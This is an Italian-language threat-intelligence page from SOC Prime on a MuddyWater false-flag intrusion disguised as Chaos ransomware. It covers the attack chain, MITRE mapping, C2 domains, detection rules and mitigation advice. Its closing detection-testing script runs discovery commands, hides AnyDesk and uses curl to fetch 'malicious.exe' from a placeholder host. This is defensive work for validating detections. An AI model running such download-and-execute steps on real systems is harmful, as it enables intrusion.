SOC Prime Bias: Critico

07 May 2026 15:26 UTC

Caos Ransomware e la Minaccia Supportata dallo Stato Dietro di Esso

Author Photo
SOC Prime Team linkedin icon Segui
Caos Ransomware e la Minaccia Supportata dallo Stato Dietro di Esso
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Sommario

All’inizio del 2026, quello che sembrava essere un normale incidente di ransomware Chaos è stato successivamente identificato come un’operazione di false-flag legata al gruppo statale iraniano MuddyWater, noto anche come Seedworm. Invece di concentrarsi sulla crittografia dei file, gli attaccanti hanno utilizzato Microsoft Teams per l’ingegneria sociale, hanno rubato credenziali e token MFA e hanno distribuito un downloader personalizzato insieme a un trojan di accesso remoto. L’operazione ha riutilizzato l’infrastruttura associata a MuddyWater, inclusi un certificato di firma del codice, ed era orientata al furto di dati e all’accesso persistente a lungo termine.

Indagine

Gli investigatori di Rapid7 hanno ricostruito la catena di intrusione dal furto di credenziali basato su Teams all’uso di strumenti di amministrazione remota legittimi come AnyDesk e DWAgent, seguito dalla consegna di ms_upd.exe, che ha recuperato un RAT personalizzato chiamato Game.exe. Il team ha identificato domini di comando e controllo, inclusi moonzonet.com and uploadfiler.com, insieme a più indirizzi IP associati e un certificato di firma precedentemente collegato a MuddyWater. L’analisi del malware ha anche rivelato comportamenti di anti-analisi, un mutex utilizzato per imporsi come esecuzione singola, e meccanismi di persistenza che coinvolgono un servizio e file nascosti.

Mitigazione

Le organizzazioni dovrebbero applicare protezioni MFA più forti, limitare l’accesso remoto al desktop e la condivisione dello schermo di Teams solo a account fidati e monitorare l’uso di strumenti di accesso remoto legittimi in contesti insoliti. Dovrebbe essere applicata una lista di permessi per i binari firmati con codice e l’esecuzione di file non firmati da directory accessibili agli utenti dovrebbe essere bloccata. I team di sicurezza dovrebbero anche controllare regolarmente l’uso dei certificati e bloccare i domini e gli indirizzi IP dannosi noti legati alla campagna.

Risposta

Se questa attività viene rilevata, isola immediatamente i sistemi interessati, revoca le credenziali compromesse e i token MFA, e inizia la raccolta completa forense. L’infrastruttura di comando e controllo identificata dovrebbe essere bloccata, i servizi AnyDesk e DWAgent dovrebbero essere rimossi e il RAT personalizzato dovrebbe essere eliminato dall’ambiente. Dovrebbe essere condotta anche una caccia alla minaccia per il mutex ATTRIBUTES_ObjectKernel e per eventuali file rimanenti memorizzati sotto ProgramData.

"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#cccccc classDef file fill:#aaffaa classDef process fill:#ffcc99 classDef malware fill:#ff9999 %% Nodes u2013 Actions action_initial_access["<b>Azione</b> – <b>T1566 Phishing</b><br/>L’avversario ha inviato messaggi di chat dannosi di Microsoft Teams che hanno attirato gli utenti in una sessione di condivisione schermo di Quick Assist falso."] class action_initial_access action action_user_exec_link["<b>Azione</b> – <b>T1204.001 Esecuzione Utente: Link Malevolo</b><br/>Le vittime hanno cliccato su un link dannoso consegnato via Teams che ha avviato il download di <i>ms_upd.exe</i>."] class action_user_exec_link action action_user_exec_copypaste["<b>Azione</b> – <b>T1204.004 Esecuzione Utente: Copia e Incolla Malevolo</b><br/>Gli attaccanti hanno istruito gli utenti a copiare-incollare le credenziali in file di testo creati localmente."] class action_user_exec_copypaste action action_cred_access["<b>Azione</b> – <b>T1552.008 Credenziali Non Sicure</b> & <b>T1078 Account Validati</b><br/>Credenziali raccolte dai messaggi di chat e utilizzate per accedere ai sistemi interni."] class action_cred_access action action_auth_mod["<b>Azione</b> – <b>T1556.001 Autenticazione Controller di Dominio</b><br/>Le credenziali compromesse sono state utilizzate per autenticarsi al controller di dominio ottenendo accesso privilegiato."] class action_auth_mod action action_discovery["<b>Azione</b> – <b>T1082 Scoperta Informazioni di Sistema</b> & <b>T1016 Scoperta Configurazione Rete di Sistema</b><br/>Il malware ha raccolto nome host, nome utente, dominio, indirizzo IP via ipconfig, whoami, ecc."] class action_discovery action action_ingress_transfer["<b>Azione</b> – <b>T1105 Trasferimento Strumenti Ingress</b><br/><i>ms_upd.exe</i> ha scaricato payload aggiuntivi (WebView2Loader.dll, Game.exe, visualwincomp.txt) usando curl."] class action_ingress_transfer action action_execution["<b>Azione</b> – <b>T1059 Interprete di Comandi e Script</b><br/>L’attaccante ha eseguito cmd.exe, PowerShell e pythonw.exe per eseguire i binari scaricati."] class action_execution action action_process_injection["<b>Azione</b> – <b>T1055.011 Iniezione Memoria Finestra Supplementare</b> & <b>T1055.002 Iniezione Portable Executable</b><br/>pythonw.exe ha iniettato codice in processi sospesi per lanciare furtivamente il RAT."] class action_process_injection action action_defense_evasion["<b>Azione</b> – <b>T1027 File o Informazioni Offuscati</b> & <b>T1497 Evasione Virtualizzazione/Sandbox</b><br/>Payload codificati in XOR, AES-256-GCM criptati; controllo di DLL di analisi, identificatori VM e timing per evitare rilevamenti da sandbox."] class action_defense_evasion action action_persistence["<b>Azione</b> – <b>T1219 Strumenti di Accesso Remoto</b><br/>Distribuzione del servizio DWAgent e di AnyDesk per il controllo remoto a lungo termine."] class action_persistence action action_lateral_movement["<b>Azione</b> – <b>T1563 Dirottamento Sessione di Servizio Remoto (RDP)</b> & <b>T1668 Controllo Esclusivo</b><br/>Utilizzate sessioni RDP legittime per spostarsi lateralmente ed eseguire comandi su host aggiuntivi."] class action_lateral_movement action action_collection_exfil["<b>Azione</b> – <b>T1560 Archiviazione Dati Raccolti</b> & <b>T1041 Esfiltrazione su Canale C2</b><br/>Dati archiviati in archivio XOR-cifrato e caricati su uploadfiler.com."] class action_collection_exfil action action_c2["<b>Azione</b> – <b>T1090 Proxy</b> & <b>T1573 Canale Criptato</b><br/>Comunicazione con l’infrastruttura C2 (moonzonet.com, uploadfiler.com) su HTTPS con payload criptati."] class action_c2 action %% Nodes u2013 Tools / Files / Processes / Malware file_ms_upd["<b>File</b> – <b>Nome</b>: ms_upd.exe<br/><b>Descrizione</b>: Dropper iniziale che recupera ulteriori payload."] class file_ms_upd file file_webview ["<b>File</b> – <b>Nome</b>: WebView2Loader.dll<br/><b>Descrizione</b>: DLL di supporto per il rendering di contenuti web."] class file_webview file file_game["<b>File</b> – <b>Nome</b>: Game.exe<br/><b>Descrizione</b>: Payload secondario eseguito dopo il download."] class file_game file file_visual["<b>File</b> – <b>Nome</b>: visualwincomp.txt<br/><b>Descrizione</b>: File di testo usato per i dati di configurazione."] class file_visual file process_cmd["<b>Processo</b> – <b>Nome</b>: cmd.exe<br/><b>Scopo</b>: Esegue istruzioni da riga di comando."] class process_cmd process process_ps["<b>Processo</b> – <b>Nome</b>: PowerShell<br/><b>Scopo</b>: Esegue script PowerShell per l’esecuzione di payload."] class process_ps process process_python["<b>Processo</b> – <b>Nome</b>: pythonw.exe<br/><b>Scopo</b>: Esegue componenti basati su Python e svolge iniezioni di processo."] class process_python process malware_dwaga["<b>Malware</b> – <b>Nome</b>: Servizio DWAgent<br/><b>Scopo</b>: Fornisce accesso remoto persistente."] class malware_dwaga malware tool_anydesk["<b>Strumento</b> – <b>Nome</b>: AnyDesk<br/><b>Descrizione</b>: Utility legittima di desktop remoto utilizzata per persistenza e movimento laterale."] class tool_anydesk tool %% Connections u2013 Flow action_initial_access –>|porta a| action_user_exec_link action_user_exec_link –>|scarica| file_ms_upd action_user_exec_link –>|porta a| action_user_exec_copypaste action_user_exec_copypaste –>|fornisce| action_cred_access action_cred_access –>|abilita| action_auth_mod action_auth_mod –>|abilita| action_discovery action_discovery –>|avvia| action_ingress_transfer action_ingress_transfer –>|scarica| file_webview action_ingress_transfer –>|scarica| file_game action_ingress_transfer –>|scarica| file_visual action_ingress_transfer –>|porta a| action_execution action_execution –>|esegue| process_cmd action_execution –>|esegue| process_ps action_execution –>|esegue| process_python process_python –>|inietta| action_process_injection action_process_injection –>|facilita| action_defense_evasion action_defense_evasion –>|abilita| action_persistence action_persistence –>|installa| malware_dwaga action_persistence –>|installa| tool_anydesk malware_dwaga –>|supporta| action_lateral_movement tool_anydesk –>|supporta| action_lateral_movement action_lateral_movement –>|raccoglie| action_collection_exfil action_collection_exfil –>|esfiltra tramite| action_c2 %% Styling class action_initial_access,action_user_exec_link,action_user_exec_copypaste,action_cred_access,action_auth_mod,action_discovery,action_ingress_transfer,action_execution,action_process_injection,action_defense_evasion,action_persistence,action_lateral_movement,action_collection_exfil,action_c2 action class file_ms_upd,file_webview,file_game,file_visual file class process_cmd,process_ps,process_python process class malware_dwaga malware class tool_anydesk tool "

Flusso dell’Attacco

Rilevamenti

Possibile Scoperta Configurazione Rete di Sistema (tramite cmdline)

Team SOC Prime
06 maggio 2026

Possibile Utilizzo di PING per Esecuzione Ritardata (tramite cmdline)

Team SOC Prime
06 maggio 2026

Software Alternativo di Accesso/Amministrazione Remota (tramite process_creation)

Team SOC Prime
06 maggio 2026

Utilizzo Sospetto di CURL (tramite cmdline)

Team SOC Prime
06 maggio 2026

Download Sospetto di File tramite IP Diretto (tramite proxy)

Team SOC Prime
06 maggio 2026

IOC (HashSha256) per rilevare: Offuscamento delle Tracce: L’Ombra di Stato Sponsorizzata dietro Chaos Ransomware

Regole AI SOC Prime
06 maggio 2026

IOC (HashSha1) per rilevare: Offuscamento delle Tracce: L’Ombra di Stato Sponsorizzata dietro Chaos Ransomware

Regole AI SOC Prime
06 maggio 2026

IOC (HashMd5) per rilevare: Offuscamento delle Tracce: L’Ombra di Stato Sponsorizzata dietro Chaos Ransomware

Regole AI SOC Prime
06 maggio 2026

IOC (SourceIP) per rilevare: Offuscamento delle Tracce: L’Ombra di Stato Sponsorizzata dietro Chaos Ransomware

Regole AI SOC Prime
06 maggio 2026

IOC (DestinationIP) per rilevare: Offuscamento delle Tracce: L’Ombra di Stato Sponsorizzata dietro Chaos Ransomware

Regole AI SOC Prime
06 maggio 2026

Strumento di Gestione Remota Sospetto ed Esecuzione di Comandi di Scoperta [Creazione Processo su Windows]

Regole AI SOC Prime
06 maggio 2026

Rileva Accessi Interattivi e Modifiche alla Configurazione MFA [Log di Sicurezza di Microsoft Windows]

Regole AI SOC Prime
06 maggio 2026

Esecuzione di Simulazione

Requisito: Il controllo di pre-volo di Telemetria & Baseline deve essere passato.

Razionale: Questa sezione dettaglia l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati e mirano a generare l’esatta telemetria prevista dalla logica di rilevamento.

  • Narrativa dell’Attacco & Comandi:

    1. Stabilire un punto d’appoggio remoto utilizzando lo strumento di gestione remota legittimo AnyDesk.exe (rispecchiando il selettore “remote-tool”).
    2. Esegui ricognizione di rete eseguendo ipconfig and whoami dalla stessa sessione – soddisfacendo il selettore “comando di scoperta”.
    3. Scaricare un carico utile dannoso utilizzando curl inviato attraverso cmd.exe, una tecnica classica per “Trasferimento Strumenti Ingress” (T1105) e “Interfaccia Linea di Comando” (T1059).
    4. Eseguire il payload per completare la kill-chain (non richiesto per la validazione della regola, ma incluso per realismo).
  • Script di Test di Regressione:

    # -------------------------------------------------
    # Script di Simulazione – attiva la regola Sigma
    # -------------------------------------------------
    # 1. Avvia AnyDesk (simulato – si assume che AnyDesk sia nel PATH)
    Start-Process -FilePath "AnyDesk.exe" -ArgumentList "--no-sandbox" -WindowStyle Hidden
    
    # 2. Esegui comandi di scoperta
    $discovery = @(
        "ipconfig /all",
        "whoami",
        "net start"
    )
    foreach ($cmd in $discovery) {
        cmd.exe /c $cmd | Out-Null
    }
    
    # 3. Usa cmd.exe + curl per recuperare un payload dummy
    $payloadUrl = "http://example.com/malicious.exe"
    $outputPath = "$env:TEMPpayload.exe"
    $downloadCmd = "curl $payloadUrl -o $outputPath"
    cmd.exe /c $downloadCmd
    
    # Facoltativo: Esegui il payload (commentato per sicurezza)
    # Start-Process -FilePath $outputPath -WindowStyle Hidden
    # -------------------------------------------------
  • Comandi di Pulizia:

    # Termina AnyDesk se è stato avviato
    Get-Process -Name "AnyDesk" -ErrorAction SilentlyContinue | Stop-Process -Force
    
    # Rimuove il payload scaricato
    Remove-Item -Path "$env:TEMPpayload.exe" -Force -ErrorAction SilentlyContinue
    
    # Cancella eventuali istanze residue di cmd.exe create dallo script
    Get-Process -Name "cmd" -ErrorAction SilentlyContinue | Stop-Process -Force

Fine del Rapporto